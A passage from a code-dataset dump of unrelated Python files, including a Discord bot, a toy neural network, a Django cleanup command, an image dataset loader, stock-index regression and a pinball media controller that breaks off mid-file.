await ctx.send('You are missing arguments in the command, please try again')\n\n#loads all cogs in ./cogs\nfor filename in os.listdir('./cogs'):\n #only if the file ends in .py\n if filename.endswith('.py') and '__init__' not in filename:\n client.load_extension(f'cogs.{filename[:-3]}')\n\n\nclient.run(TOKEN)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"166773261","text":"import numpy as np\nfrom numpy import array\nimport random\nimport scipy\nfrom scipy import ndimage\n\nepochs = 100000\ninputLayerSize = 2\nhiddenLayerSizes = [3,6]\noutputLayerSize = 2 #in and out of circle\n\n#randomly generate starting weights. There are weights between every two layers.\nweights = []\nweights.append(np.random.uniform(low = -1.0, size=(inputLayerSize,hiddenLayerSizes[0])))\nfor i in range(len(hiddenLayerSizes)-1):\n weights.append(np.random.uniform(low = -1.0, size=(hiddenLayerSizes[i],hiddenLayerSizes[i+1])))\nweights.append(np.random.uniform(low = -1.0, size=(hiddenLayerSizes[-1],outputLayerSize)))\n\n#randomly generate starting biases. There is bias at every layer except input.\nbiases = []\nfor i in range(len(hiddenLayerSizes)):\n biases.append(np.random.uniform(low = -1.0, size=(1,hiddenLayerSizes[i])))\nbiases.append(np.random.uniform(low = -1.0, size=(1,outputLayerSize)))\n\n#lambda\nlearnrate = 0.02\n\ndef train(x,c):\n '''x is array of inputs and c is correct output value.\n train \n '''\n global weights, biases\n activations = [array([x])]\n input_sums = [array([x])]\n #Now run feedforward\n for weight,bias in zip(weights,biases): #because same length and zip is cool!\n input_sums.append(activations[-1].dot(weight)+bias)\n activations.append(sigmoid(input_sums[-1])) #this line does all the work\n result = np.argmax(activations[-1])\n if result != c: #if didn't choose the right node\n deltaSigs = []\n deltaSigs.append(np.copy(input_sums[-1])) #going backwards, E = Z-c\n deltaSigs[0][0][c] -= 1\n #Now adjust weights and biases using the delta signal\n for i in range(len(weights)):\n deltaSig = deltaSigs[-1].dot(weights[-i-1].T)\n deltaSig1 = deltaSig*sigmoid_prime(activations[-i-2])\n deltaSigs.append(deltaSig1) #creating delta signals\n for i in range(len(weights)):\n weights[i] -= learnrate * activations[i].T.dot(deltaSigs[-i-2]) #don't want to include the output activation, and using last set of delta signals\n #when deltaSig (which is like error for a certain node) is large, then weight goes down so it factors in less\n biases[i] -= deltaSigs[-i-2] * learnrate #is like weights, where activation is 1 :D\n \n\ndef sigmoid(x): #errors will always be between 0 and 1\n '''The activation function.'''\n return 1/(1+np.exp(-x))\n\ndef sigmoid_prime(y): #looks nice with output which we store :D <3 yaaay\n '''Derivative of the activation function. Used in backpropagation.'''\n return y*(1-y)\n\n#generate inputs\n\n\nfor i in range(epochs):\n x = np.random.uniform(low = 0, high = 1.0, size = 2) \n c = 1 if x[0]**2 + x[1]**2 < 1 else 0\n train(x,c)\n\nnum = 1000\ncorrect = 0\nfor i in range(num):\n x = np.random.uniform(low = 0, high = 1.0, size = 2) \n c = 1 if x[0]**2 + x[1]**2 < 1 else 0\n activations = [array([x])]\n for weight,bias in zip(weights,biases): #because same length and zip is cool! \n activations.append(sigmoid(np.dot(activations[-1],weight)+bias)) #this line does all the work\n result = np.argmax(activations[-1])\n #print(activations) \n if result == c:\n correct += 1\n\nprint (correct)\nprint (weights)\nprint (biases)\n","sub_path":"Circle-Kevin minus comments.py","file_name":"Circle-Kevin minus comments.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"529831152","text":"from setuptools import setup, find_packages\n# import os\n\nversion = '1.0.b2'\n\nsetup(name='readset.i18n',\n version=version,\n description=\"This package provides a Normalizer for Chinese character\",\n long_description=open(\"README.rst\").read() + \"\\n\" +\n open(\"CHANGES.rst\").read(),\n # Get more strings from\n # http://pypi.python.org/pypi?:action=list_classifiers\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Web Environment\",\n \"Framework :: Plone\",\n \"Framework :: Zope2\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Natural Language :: Chinese (Simplified)\",\n \"Natural Language :: Chinese (Traditional)\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: Text Processing\",\n ],\n keywords='Zope Plone i18n i10n Pinyin',\n author='Jian Aijun',\n author_email='jianaijun@gmail.com',\n url='http://pypi.python.org/pypi/readset.i18n',\n license='GPL version 2',\n package_dir={'': 'src'},\n packages=find_packages('src'),\n namespace_packages=['readset'],\n include_package_data=True,\n zip_safe=False,\n test_suite=\"readset.i18n\",\n install_requires=[\n 'setuptools',\n 'zope.interface',\n 'zope.component',\n 'zope.publisher',\n 'plone.i18n',\n ],\n extras_require={\n 'test': [\n 'zope.component [zcml]',\n 'zope.configuration',\n 'zope.browserresource',\n 'plone.testing',\n 'zope.testing',\n ]\n },\n entry_points=\"\"\"\n # -*- Entry points: -*-\n\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"421917129","text":"from datetime import datetime\n\nfrom django.contrib.auth.models import User\nfrom django.core.management.base import BaseCommand\nfrom django.db.models import Count\n\nfrom app.models import Email\n\n\nclass Command(BaseCommand):\n help = 'Deletes DR3 emails'\n\n def handle(self, *args, **options):\n emails = Email.objects\\\n .annotate(recipient__goal_count=Count('recipient__goal'))\\\n .filter(name='dr3')\\\n .filter(recipient__date_joined__gte=datetime(2016, 12, 28))\\\n .filter(recipient__date_joined__lte=datetime(2017, 1, 15))\\\n .filter(recipient__goal_count=0)\n\n print(emails.count())\n\n for email in emails:\n email.recipient.delete()\n","sub_path":"app/management/commands/deletedr3users.py","file_name":"deletedr3users.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"261399625","text":"from __future__ import print_function, division\nimport os\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nfrom scipy.io import loadmat\nimport logging\nimport copy\nfrom tqdm import tqdm\nfrom PIL import Image\nimport numpy as np\nimport fnmatch\nimport csv\n\ndata_path_from_home = '/Data/tokyoTimeMachine'\ndata_path = os.environ['HOME'] + data_path_from_home\n\nimage_transform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n ]\n)\n\nclass TokyoDataSet(Dataset):\n\n def __init__(self, type='train', mode='db', root_dir = data_path, transforms=image_transform):\n\n self.logger = self.generate_logger(type)\n self.type = type\n self.logger.info('Loading Tokyo ' + ('Train' if type == 'train' else 'Val') + ' Matrix')\n mat_file = '/tokyoTM_train.mat' if type == 'train' else '/tokyoTM_val.mat'\n mat = loadmat(os.path.join(root_dir + mat_file))['dbStruct'][0][0]\n self.root_dir = root_dir\n self.image_dir = self.root_dir + '/images'\n adder = 0 if mode == 'db' else 3\n self.length = len(mat[adder + 1])\n self.data = [{} for _ in range(self.length)]\n self.transforms = transforms\n self.utm = [[mat[adder+2][0][i], mat[adder+2][1][i]] for i in range(self.length)]\n\n\n for idx in tqdm(range(self.length)):\n self.data[idx]['filename'] = mat[adder + 1][idx][0][0]\n self.data[idx]['utm_coordinate'] = (mat[adder + 2][0][idx], mat[adder + 2][1][idx])\n self.data[idx]['timestamp'] = mat[adder + 3][0][idx]\n self.data[idx]['image'] = os.path.join(self.image_dir, self.data[idx]['filename'])\n self.data[idx]['original_image'] = os.path.join(self.image_dir, self.data[idx]['filename'])\n\n if mode == 'query':\n self.data[idx]['pos'] = [-1] * 10\n self.data[idx]['neg'] = [-1] * 10\n\n self.logger.info('Done')\n\n def __len__(self):\n return self.length\n\n def __getitem__(self, idx):\n\n ret = copy.deepcopy(self.data[idx])\n ret['image'] = self.transforms(Image.open(self.data[idx]['image']))\n ret['original_image'] = Image.open(self.data[idx]['original_image'])\n return ret\n\n def generate_logger(self, type):\n logger_name = 'trainData' if type == 'train' else 'valData'\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.INFO)\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n formatter = logging.Formatter('%(levelname)s: %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n return logger\n\n def set(self, idx, key, val):\n self.data[idx][key] = val\n\n\nclass TokyoTrainDataSet(TokyoDataSet):\n\n def __init__(self, mode='db', GT_from_file=False):\n super().__init__(type='train', mode=mode)\n\n\nclass TokyoValDataSet(TokyoDataSet):\n\n def __init__(self, mode='db', GT_from_file=False):\n super().__init__(type='val', mode=mode)\n\n\nclass Tokyo247(Dataset):\n\n def __init__(self, root_dir=data_path, transform=image_transform):\n self.logger = self.generate_logger\n self.root_dir = root_dir\n self.image_dir = root_dir + '/247query_v3'\n self.matname = np.sort(fnmatch.filter(os.listdir(self.image_dir), '*.csv'))\n self.imname = np.sort(fnmatch.filter(os.listdir(self.image_dir), '*.jpg'))\n self.length = len(self.imname)\n self.data = np.array([{} for _ in range(self.length)])\n self.transforms = image_transform\n\n for idx in tqdm(range(self.length)):\n f = open(self.image_dir + '/' + self.matname[idx])\n mat = csv.reader(f, delimiter=',')\n mat = list(mat)[0]\n f.close()\n\n self.data[idx]['filename'] = mat[0]\n self.data[idx]['utm_coordinate'] = (mat[7], mat[8])\n self.data[idx]['image'] = os.path.join(self.image_dir, self.data[idx]['filename'])\n\n\n def __len__(self):\n return self.length\n\n def __getitem__(self, idx):\n\n ret = copy.deepcopy(self.data[idx])\n ret['image'] = self.transforms(Image.open(self.data[idx]['image']))\n return ret\n\n\n def generate_logger(self):\n logger_name = 'testData'\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.INFO)\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n formatter = logging.Formatter('%(levelname)s: %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n return logger\n\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"40151393","text":"import Funzioni\r\nfrom Funzioni import *\r\nfrom Dati import *\r\n\r\n\r\n\r\nPulizia_File(\"Dati_Punti_Possibili.txt\")\r\n\r\nfinput = open(\"Dati_Punti.txt\", \"r\")\r\nfoutput = open(\"Dati_Punti_Possibili.txt\", \"w\")\r\n\r\ntry:\r\n for line in finput.read().split(\"\\n\"):\r\n Dati = list()\r\n triangoli = line.split(\"|;\")\r\n triangoli.pop()\r\n for triangolo in triangoli:\r\n lt = list()\r\n punti = triangolo.split(\"|\")\r\n for punto in punti:\r\n x,y = punto.split(\",\")\r\n lt.append([int(x),int(y)])\r\n Dati.append(lt)\r\n\r\n if Collisione_Braccio_Triangolo(Dati, Ostacolo1) or Collisione_Braccio_Triangolo(Dati, Ostacolo2):\r\n continue\r\n else:\r\n foutput.write(str(Dati)+\"\\n\")\r\nexcept Exception as e:\r\n pass\r\n \r\n \r\n \r\n\r\n \r\nfinput.close()\r\nfoutput.close()\r\n\r\n\r\n","sub_path":"libs/Calcoli_Punti_Possibili.py","file_name":"Calcoli_Punti_Possibili.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646032200","text":"\r\nimport os\r\n\r\ndef fiboNum (Fn):\r\n\r\n if Fn == 0:\r\n return 0\r\n\r\n elif Fn == 1:\r\n return 1\r\n else:\r\n result = fiboNum(Fn-1) + fiboNum(Fn-2)\r\n return result\r\n\r\n# Ask how many numbers they want\r\nnumFibValues = int(input(\"How many Fibonacci values should be found? \"))\r\n\r\n\r\n\r\n# Loop while calling for each new number\r\n\r\ni = 1\r\nwhile i < numFibValues:\r\n fibValue = fiboNum(i)\r\n print(fibValue)\r\n\r\n i += 1\r\n\r\nprint(\"Task Completed\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"ReadingAndWritingFiles/FibonacciWithUser/FibonacciValuesWithUserInput.py","file_name":"FibonacciValuesWithUserInput.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3362813","text":"\nimport pandas_datareader.data as web\nimport statsmodels.api as sm\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\n\nend='2016/9/30'\nn225 = web.DataReader(\"NIKKEI225\", 'fred',\"1949/5/16\",end).dropna()\nlnn225=np.log(n225.dropna())\nlnn225.columns=['Close']\ny=lnn225\nx=range(len(lnn225))\nx=sm.add_constant(x)\nmodel=sm.OLS(y,x)\nresults=model.fit()\n\nprint(results.summary())\n\n\n\n\n\n\ny=lnn225.loc['1986/12/1':'1993/10/31'].dropna()\nx=range(len(y))\nx=sm.add_constant(x)\nmodel=sm.OLS(y,x)\nresults=model.fit()\nprint(results.summary())\n\n\n\n\ny=lnn225.loc['1986/12/1':'1989/12/31'].dropna()\nx=range(len(y))\nx=sm.add_constant(x)\nmodel=sm.OLS(y,x)\nresults=model.fit()\nprint(results.summary())\n\n\nprint(\"return \",np.exp(y.Close).pct_change().mean()*250)\nprint(\"volatility \",y.Close.diff().std()*np.sqrt(250))\nprint(\"std of residual\",results.resid.std())\nplt.plot(y,label='Close',color='darkgray')\n\n\nresults.resid.hist(bins=10,color=\"lightyellow\")\nplt.xlabel('residual')\nplt.ylabel('frequency')\n\n\n\nplt.show()\n\n","sub_path":"6.4.15.py","file_name":"6.4.15.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382878631","text":"\"\"\"\nTemplate testing suite for 2048\n\"\"\"\n\nimport poc_simpletest\n\n# Directions, DO NOT MODIFY\nUP = 1\nDOWN = 2\nLEFT = 3\nRIGHT = 4\n\ndef run_suite(game_class):\n \"\"\"\n Some informal testing code\n \"\"\"\n \n # create a TestSuite object\n suite = poc_simpletest.TestSuite() \n \n # create a game\n game = game_class(2,2)\n \n # add tests using suite.run_test(....) here\n\n # test the initial configuration of the board using the str method\n suite.run_test(str(game), str([]), \"Test #0: init\")\n \n # suite.run_test(game.reset(), str([]), \"Test #1: reset\")\n game.reset()\n suite.run_test(str(game), str([[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0]]), \"Test #1: reset\")\n\n suite.run_test(game.get_grid_height(), 2 , \"Test #2: get_grid_height\")\n suite.run_test(game.get_grid_width(), 3 , \"Test #3: get_grid_width\")\n \n game.set_tile(0, 0, 5)\n game.set_tile(0, 1, 5)\n game.set_tile(1, 0, 5)\n game.set_tile(1, 1, 5)\n game.set_tile(2, 0, 5)\n game.set_tile(0, 2, 5)\n game.set_tile(2, 2, 5)\n game.set_tile(-1, 2, 5)\n #game.set_tile(, , 5)\n #game.move(UP)\n #game.move(DOWN)\n #game.move(LEFT)\n #game.move(RIGHT)\n \n # report number of tests and failures\n suite.report_results()\n","sub_path":"Coursera/2015_PrincipleOfComputing_Rice/Wk2_Proj2_Final14_Test_user40_bJHRdpmDGW_19.py","file_name":"Wk2_Proj2_Final14_Test_user40_bJHRdpmDGW_19.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"568820366","text":"import logging\nfrom typing import Union\n\nfrom aiogram.dispatcher.dispatcher import Dispatcher\nimport aiogram.utils.markdown as fmt\nfrom aiogram import types\n\nfrom tgbot.database import connect\nfrom .keyboards import main_keyboard_kb \nfrom main_menu.dbworker import add_user\n\nlogger = logging.getLogger(__name__)\n\n\ndef main_munu_register(dp: Dispatcher):\n dp.register_message_handler(start_cmd, commands=['start'])\n\n\nasync def start_cmd(message: Union[types.CallbackQuery, types.Message], **kwargs):\n if isinstance(message, types.Message): \n chat_id = message.chat.id\n elif isinstance(message, types.CallbackQuery): \n chat_id = message.message.chat.id\n message = message.message\n \n connection = await connect()\n await add_user(connection, chat_id)\n markup = await main_keyboard_kb(connection)\n\n await message.reply(\n reply=False,\n reply_markup=markup,\n disable_notification=True,\n text=fmt.hbold('Категории главного меню')\n )\n connection.close()\n","sub_path":"main_menu/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"243136706","text":"\"\"\"Pygame-based media controller for MPF (BCP) v1.0\"\"\"\n# media_controller.py\n# Mission Pinball Framework\n# Written by Brian Madden & Gabe Knuth\n# Released under the MIT License. (See license info at the end of this file.)\n\n# Documentation and more info at http://missionpinball.com/mpf\n\nimport logging\nimport os\nimport sys\nimport time\nfrom distutils.version import LooseVersion\nimport Queue\n\n\nimport pygame\n\nfrom mpf.media_controller.core import *\nfrom mpf.media_controller.core.bcp_server import BCPServer\nfrom mpf.system.config import Config, CaseInsensitiveDict\nfrom mpf.system.events import EventManager\nfrom mpf.system.timing import Timing\nfrom mpf.system.tasks import Task, DelayManager\nfrom mpf.system.player import Player\nimport mpf.system.bcp as bcp\nimport version\n\n\nclass MediaController(object):\n\n def __init__(self, options):\n self.options = options\n\n self.log = logging.getLogger(\"MediaController\")\n self.log.info(\"Media Controller Version %s\", version.__version__)\n self.log.debug(\"Backbox Control Protocol Version %s\",\n version.__bcp_version__)\n self.log.debug(\"Config File Version %s\",\n version.__config_version__)\n\n python_version = sys.version_info\n self.log.debug(\"Python version: %s.%s.%s\", python_version[0],\n python_version[1], python_version[2])\n self.log.debug(\"Platform: %s\", sys.platform)\n self.log.debug(\"Python executable location: %s\", sys.executable)\n self.log.debug(\"32-bit Python? %s\", sys.maxsize < 2**32)\n\n self.active_debugger = dict()\n\n self.config = dict()\n self.done = False # todo\n self.machine_path = None\n self.asset_managers = dict()\n self.num_assets_to_load = 0\n self.window = None\n self.window_manager = None\n self.pygame = False\n self.pygame_requested = False\n self.registered_pygame_handlers = dict()\n self.pygame_allowed_events = list()\n self.socket_thread = None\n self.receive_queue = Queue.Queue()\n self.sending_queue = Queue.Queue()\n self.crash_queue = Queue.Queue()\n self.modes = CaseInsensitiveDict()\n self.player_list = list()\n self.player = None\n self.HZ = 0\n self.next_tick_time = 0\n self.secs_per_tick = 0\n\n Task.create(self._check_crash_queue)\n\n self.bcp_commands = {'ball_start': self.bcp_ball_start,\n 'ball_end': self.bcp_ball_end,\n 'config': self.bcp_config,\n 'error': self.bcp_error,\n 'get': self.bcp_get,\n 'goodbye': self.bcp_goodbye,\n 'hello': self.bcp_hello,\n 'mode_start': self.bcp_mode_start,\n 'mode_stop': self.bcp_mode_stop,\n 'player_added': self.bcp_player_add,\n 'player_score': self.bcp_player_score,\n 'player_turn_start': self.bcp_player_turn_start,\n 'player_variable': self.bcp_player_variable,\n 'reset': self.reset,\n 'set': self.bcp_set,\n 'shot': self.bcp_shot,\n 'switch': self.bcp_switch,\n 'timer': self.bcp_timer,\n 'trigger': self.bcp_trigger,\n }\n\n # load the MPF config & machine defaults\n self.config = (\n Config.load_config_yaml(config=self.config,\n yaml_file=self.options['mcconfigfile']))\n\n # Find the machine_files location. If it starts with a forward or\n # backward slash, then we assume it's from the mpf root. Otherwise we\n # assume it's from the subfolder location specified in the\n # mpfconfigfile location\n\n if (options['machinepath'].startswith('/') or\n options['machinepath'].startswith('\\\\')):\n machine_path = options['machinepath']\n else:\n machine_path = os.path.join(self.config['media_controller']['paths']\n ['machine_files'],\n options['machinepath'])\n\n self.machine_path = os.path.abspath(machine_path)\n\n # Add the machine folder to our path so we can import modules from it\n sys.path.append(self.machine_path)\n\n self.log.info(\"Machine folder: %s\", machine_path)\n\n # Now find the config file location. Same as machine_file with the\n # slash uses to specify an absolute path\n\n if (options['configfile'].startswith('/') or\n options['configfile'].startswith('\\\\')):\n config_file = options['configfile']\n else:\n\n if not options['configfile'].endswith('.yaml'):\n options['configfile'] += '.yaml'\n\n config_file = os.path.join(self.machine_path,\n self.config['media_controller']['paths']\n ['config'],\n options['configfile'])\n\n self.log.debug(\"Base machine config file: %s\", config_file)\n\n # Load the machine-specific config\n self.config = Config.load_config_yaml(config=self.config,\n yaml_file=config_file)\n\n mediacontroller_config_spec = '''\n exit_on_disconnect: boolean|True\n port: int|5050\n '''\n\n self.config['media_controller'] = (\n Config.process_config(mediacontroller_config_spec,\n self.config['media_controller']))\n\n self.events = EventManager(self, setup_event_player=False)\n self.timing = Timing(self)\n\n # Load the media controller modules\n self.config['media_controller']['modules'] = (\n self.config['media_controller']['modules'].split(' '))\n self.log.info(\"Loading Modules...\")\n for module in self.config['media_controller']['modules']:\n self.log.debug(\"Loading module: %s\", module)\n module_parts = module.split('.')\n exec('self.' + module_parts[0] + '=' + module + '(self)')\n\n # todo there's probably a more pythonic way to do this, and I know\n # exec() is supposedly unsafe, but meh, if you have access to put\n # malicious files in the system folder then you have access to this\n # code too.\n\n self.start_socket_thread()\n\n self.events.post(\"init_phase_1\")\n self.events.post(\"init_phase_2\")\n self.events.post(\"init_phase_3\")\n self.events.post(\"init_phase_4\")\n self.events.post(\"init_phase_5\")\n\n self.reset()\n\n def _check_crash_queue(self):\n try:\n crash = self.crash_queue.get(block=False)\n except Queue.Empty:\n yield 1000\n else:\n self.log.critical(\"MPF Shutting down due to child thread crash\")\n self.log.critical(\"Crash details: %s\", crash)\n self.done = True\n\n def reset(self, **kwargs):\n \"\"\"Processes an incoming BCP 'reset' command.\"\"\"\n self.player = None\n self.player_list = list()\n\n self.events.post('mc_reset_phase_1')\n self.events.post('mc_reset_phase_2')\n self.events.post('mc_reset_phase_3')\n\n def get_window(self):\n \"\"\" Returns a reference to the onscreen display window.\n\n This method will set up a window if one doesn't exist yet. This method\n exists because there are several different modules and plugins which\n may want to use a window, but we don't know which combinations might\n be used, so we centralize the creation and management of an onscreen\n window here.\n \"\"\"\n\n if not self.window:\n self.window_manager = window.WindowManager(self)\n self.window = self.window_manager.window\n\n return self.window\n\n def request_pygame(self):\n \"\"\"Called by a module to let the system know it would like to use\n Pygame. We centralize the requests instead of letting each module do\n their own pygame.init() so we get it in one place and can get everthing\n initialized in the right order.\n\n Returns: True or False, depending on whether pygame is available or not.\n \"\"\"\n\n if pygame and not self.pygame_requested:\n self.events.add_handler('init_phase_3', self._pygame_init)\n self.pygame_requested = True\n return True\n\n else:\n return False\n\n def _pygame_init(self):\n # performs the actual pygame initialization\n\n if not pygame:\n self.log.critical(\"Pygame is needed but not available. Please \"\n \"install Pygame and try again.\")\n raise Exception(\"Pygame is needed but not available. Please install\"\n \" Pygame and try again.\")\n\n if not self.pygame:\n self.log.debug(\"Initializing Pygame, version %s\",\n pygame.version.ver)\n\n pygame.init()\n self.pygame = True\n\n self.events.add_handler('timer_tick', self.get_pygame_events,\n priority=1000)\n\n self.events.post('pygame_initialized')\n\n def register_pygame_handler(self, event, handler):\n \"\"\"Registers a method to be a handler for a certain type of Pygame\n event.\n\n Args:\n event: A string of the Pygame event name you're registering this\n handler for.\n handler: A method that will be called when this Pygame event is\n posted.\n \"\"\"\n if event not in self.registered_pygame_handlers:\n self.registered_pygame_handlers[event] = set()\n\n self.registered_pygame_handlers[event].add(handler)\n self.pygame_allowed_events.append(event)\n\n self.log.debug(\"Adding Window event handler. Event:%s, Handler:%s\",\n event, handler)\n\n pygame.event.set_allowed(self.pygame_allowed_events)\n\n def get_pygame_events(self):\n \"\"\"Gets (and dispatches) Pygame events. Automatically called every\n machine loop via the timer_tick event.\n \"\"\"\n for event in pygame.event.get():\n if event.type in self.registered_pygame_handlers:\n for handler in self.registered_pygame_handlers[event.type]:\n\n if (event.type == pygame.KEYDOWN or\n event.type == pygame.KEYUP):\n handler(event.key, event.mod)\n else:\n handler()\n\n def _process_command(self, bcp_command, **kwargs):\n self.log.debug(\"Processing command: %s %s\", bcp_command, kwargs)\n\n\n # Can't use try/except KeyError here becasue there could be a KeyError\n # in the callback which we don't want it to swallow.\n if bcp_command in self.bcp_commands:\n self.bcp_commands[bcp_command](**kwargs)\n else:\n self.log.warning(\"Received invalid BCP command: %s\", bcp_command)\n self.send('error', message='invalid command', command=bcp_command)\n\n\n def send(self, bcp_command, callback=None, **kwargs):\n \"\"\"Sends a BCP command to the connected pinball controller.\n\n Args:\n bcp_command: String of the BCP command name.\n callback: Optional callback method that will be called when the\n command is sent.\n **kwargs: Optional additional kwargs will be added to the BCP\n command string.\n\n \"\"\"\n self.sending_queue.put(bcp.encode_command_string(bcp_command,\n **kwargs))\n if callback:\n callback()\n\n def send_dmd_frame(self, data):\n \"\"\"Sends a DMD frame to the BCP client.\n\n Args:\n data: A 4096-length raw byte string.\n \"\"\"\n\n dmd_string = 'dmd_frame?' + data\n self.sending_queue.put(dmd_string)\n\n def _timer_init(self):\n self.HZ = 30\n self.next_tick_time = time.time()\n self.secs_per_tick = 1.0 / self.HZ\n\n def timer_tick(self):\n \"\"\"Called by the platform each machine tick based on self.HZ\"\"\"\n self.timing.timer_tick() # notifies the timing module\n self.events.post('timer_tick') # sends the timer_tick system event\n Task.timer_tick() # notifies tasks\n DelayManager.timer_tick()\n\n def run(self):\n \"\"\"Main run loop.\"\"\"\n self._timer_init()\n\n self.log.info(\"Starting the run loop at %sHz\", self.HZ)\n\n start_time = time.time()\n loops = 0\n\n secs_per_tick = self.secs_per_tick\n\n self.next_tick_time = time.time()\n\n try:\n while self.done is False:\n time.sleep(0.001)\n\n self.get_from_queue()\n\n if self.next_tick_time <= time.time(): # todo change this\n self.timer_tick()\n self.next_tick_time += secs_per_tick\n loops += 1\n\n self._do_shutdown()\n self.log.info(\"Target loop rate: %s Hz\", self.HZ)\n self.log.info(\"Actual loop rate: %s Hz\",\n loops / (time.time() - start_time))\n\n except KeyboardInterrupt:\n self.shutdown()\n\n def shutdown(self):\n \"\"\"Shuts down and exits the media controller.\n\n This method will also send the BCP 'goodbye' command to any connected\n clients.\n \"\"\"\n self.socket_thread.stop()\n\n def _do_shutdown(self):\n if self.pygame:\n pygame.quit()\n\n def socket_thread_stopped(self):\n \"\"\"Notifies the media controller that the socket thread has stopped.\"\"\"\n self.done = True\n\n def start_socket_thread(self):\n \"\"\"Starts the BCPServer socket thread.\"\"\"\n self.socket_thread = BCPServer(self, self.receive_queue,\n self.sending_queue)\n self.socket_thread.daemon = True\n self.socket_thread.start()\n\n def get_from_queue(self):\n \"\"\"Gets and processes all queued up incoming BCP commands.\"\"\"\n while not self.receive_queue.empty():\n cmd, kwargs = bcp.decode_command_string(\n self.receive_queue.get(False))\n self._process_command(cmd, **kwargs)\n\n def bcp_hello(self, **kwargs):\n \"\"\"Processes an incoming BCP 'hello' command.\"\"\"\n try:\n if LooseVersion(kwargs['version']) == (\n LooseVersion(version.__bcp_version__)):\n self.send('hello', version=version.__bcp_version__)\n else:\n self.send('hello', version='unknown protocol version')\n except:\n self.log.warning(\"Received invalid 'version' parameter with \"\n \"'hello'\")\n\n def bcp_goodbye(self, **kwargs):\n \"\"\"Processes an incoming BCP 'goodbye' command.\"\"\"\n if self.config['media_controller']['exit_on_disconnect']:\n self.socket_thread.sending_thread.stop()\n sys.exit()\n\n def bcp_mode_start(self, name=None, priority=0, **kwargs):\n \"\"\"Processes an incoming BCP 'mode_start' command.\"\"\"\n if not name:\n return\n #todo raise error\n\n if name == 'game':\n self._game_start()\n\n if name in self.modes:\n self.modes[name].start(priority=priority)\n\n def bcp_mode_stop(self, name, **kwargs):\n \"\"\"Processes an incoming BCP 'mode_stop' command.\"\"\"\n if not name:\n return\n #todo raise error\n\n if name == 'game':\n self._game_end()\n\n if name in self.modes:\n self.modes[name].stop()\n\n def bcp_error(self, **kwargs):\n \"\"\"Processes an incoming BCP 'error' command.\"\"\"\n self.log.warning('Received error command from client')\n\n def bcp_ball_start(self, **kwargs):\n \"\"\"Processes an incoming BCP 'ball_start' command.\"\"\"\n kwargs['player'] = kwargs.pop('player_num')\n\n self.events.post('ball_started', **kwargs)\n\n def bcp_ball_end(self, **kwargs):\n \"\"\"Processes an incoming BCP 'ball_end' command.\"\"\"\n self.events.post('ball_ended', **kwargs)\n\n def _game_start(self, **kargs):\n \"\"\"Processes an incoming BCP 'game_start' command.\"\"\"\n self.player = None\n self.player_list = list()\n self.num_players = 0\n self.events.post('game_started', **kargs)\n\n def _game_end(self, **kwargs):\n \"\"\"Processes an incoming BCP 'game_end' command.\"\"\"\n self.player = None\n self.events.post('game_ended', **kwargs)\n\n def bcp_player_add(self, player_num, **kwargs):\n \"\"\"Processes an incoming BCP 'player_add' command.\"\"\"\n\n if player_num > len(self.player_list):\n new_player = Player(self, self.player_list)\n\n self.events.post('player_add_success', num=player_num)\n\n def bcp_player_variable(self, name, value, prev_value, change, player_num,\n **kwargs):\n \"\"\"Processes an incoming BCP 'player_variable' command.\"\"\"\n\n try:\n self.player_list[int(player_num)-1][name] = value\n except (IndexError, KeyError):\n pass\n\n def bcp_player_score(self, value, prev_value, change, player_num,\n **kwargs):\n \"\"\"Processes an incoming BCP 'player_score' command.\"\"\"\n\n try:\n self.player_list[int(player_num)-1]['score'] = int(value)\n except (IndexError, KeyError):\n pass\n\n def bcp_player_turn_start(self, player_num, **kwargs):\n \"\"\"Processes an incoming BCP 'player_turn_start' command.\"\"\"\n\n self.log.debug(\"bcp_player_turn_start\")\n\n if ((self.player and self.player.number != player_num) or\n not self.player):\n\n try:\n self.player = self.player_list[int(player_num)-1]\n except IndexError:\n self.log.error('Received player turn start for player %s, but '\n 'only %s player(s) exist',\n player_num, len(self.player_list))\n\n def 